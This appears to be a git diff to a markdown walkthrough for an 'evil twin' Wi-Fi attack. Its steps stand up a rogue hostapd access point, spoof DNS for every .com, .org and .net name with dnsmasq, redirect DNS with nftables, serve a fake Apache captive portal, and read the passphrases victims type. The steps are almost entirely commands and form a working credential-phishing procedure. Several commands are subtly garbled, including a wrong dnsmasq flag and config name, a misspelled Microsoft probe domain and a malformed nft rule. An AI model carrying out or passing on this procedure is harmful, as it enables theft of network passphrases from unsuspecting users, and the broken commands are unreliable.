@@ -329,6 +329,117 @@ Configure the login page to redirect to `login_check.php`:
329329sudo mousepad /var/www/html/portal/login_check.php
330330```
331331
332+ ### 9. Assign an IP address and activate the interface:
333+
334+ ``` bash
335+ sudo ip addr add 192.168.87.1/24 dev wlan0
336+ sudo ip link set wlan0 up
337+ ```
338+
339+ ### 10. Ensure dnsmasq is installed:
340+
341+ ``` bash
342+ sudo apt install dnsmasq
343+ ```
344+
345+ ### 11. Create the DHCP config file at ` /home/kali/dnsmasq.conf ` and add spoofing entries for top-level domains:
346+
347+ ``` bash
348+ address=/com/192.168.0.1
349+ address=/org/192.168.0.1
350+ address=/net/192.168.0.1
351+ ```
352+
353+ ### 12. For Windows 7 & 10 captive portal detection, add:
354+
355+ ``` bash
356+ address=/dns.msftncsicom/131.107.255.255
357+ ```
358+
359+ ### 13. Start dnsmasq with the config file:
360+
361+ ``` bash
362+ sudo dnsmasq –conf-file=dnsmasq.com
363+ ```
364+
365+ ### 14. Verify if dnsmasq is running successfully:
366+
367+ ``` bash
368+ sudo tail /var/log/syslog | grep dnsmasq
369+ ```
370+
371+ ### 15. Install nftables:
372+
373+ ``` bash
374+ sudo apt install nftables
375+ ```
376+
377+ ### 16. Add required rules:
378+
379+ ``` bash
380+ sudo nft add table ip nat
381+ sudo nft ‘add chain ip nat PREROUTING { type nat hook prerouting priority dstnat; policy; accept; }’
382+ sudo nft add rule ip nat PREROUTING iifname “wlan0” udp dport 53 counter redirect to :53
383+ ```
384+
385+ ### 17. Modify Apache configuration:
386+
387+ ``` bash
388+ sudo mousepad /etc/apache2/sites-enabled/000-default.conf
389+ ```
390+
391+ ### 18. Enable necessary modules and restart Apache:
392+
393+ ``` bash
394+ sudo a2enmod rewrite && sudo a2enmod alias
395+ sudo systemctl restart apache2
396+ ```
397+
398+ ### 19. Check the portal by navigating to:
399+
400+ ``` bash
401+ Firefox 127.0.0.1/portal/index.php
402+ ```
403+
404+ ### 20. Install hostapd and edit the configuration:
405+
406+ ``` bash
407+ sudo apt install hostapd && mousepad hostapd.conf
408+ ```
409+
410+ ### 21. Create and run a 802.11n AP:
411+
412+ ``` bash
413+ sudo hostapd -B hostapd.conf
414+ ```
415+
416+ ### 22. Monitor the logs in two separate terminals:
417+
418+ - Terminal 1:
419+
420+ ``` bash
421+ sudo tail -f /var/log/syslog | grep -E ‘(dnsmasq| hostapd)’
422+ ```
423+
424+ - Terminal 2:
425+
426+ ``` bash
427+ sudo tail -f /var/log/apache2/access.log
428+ ```
429+
430+ ### 23. Search for passphrase files in ` /tmp/ ` :
431+
432+ ``` bash
433+ sudo find /tmp/ -iname passphrase.txt
434+ ```
435+
436+ ### 24. Read the contents of the passphrase file:
437+
438+ ``` bash
439+ sudo cat /tmp/systemd-private-b37…aef-apache2.service-b...i/tmp/passphrase.txt
440+ ```
441+
442+
332443## Information Discovery Example
333444``` bash
334445- ESSID of JesusIsTheWay
0 commit comments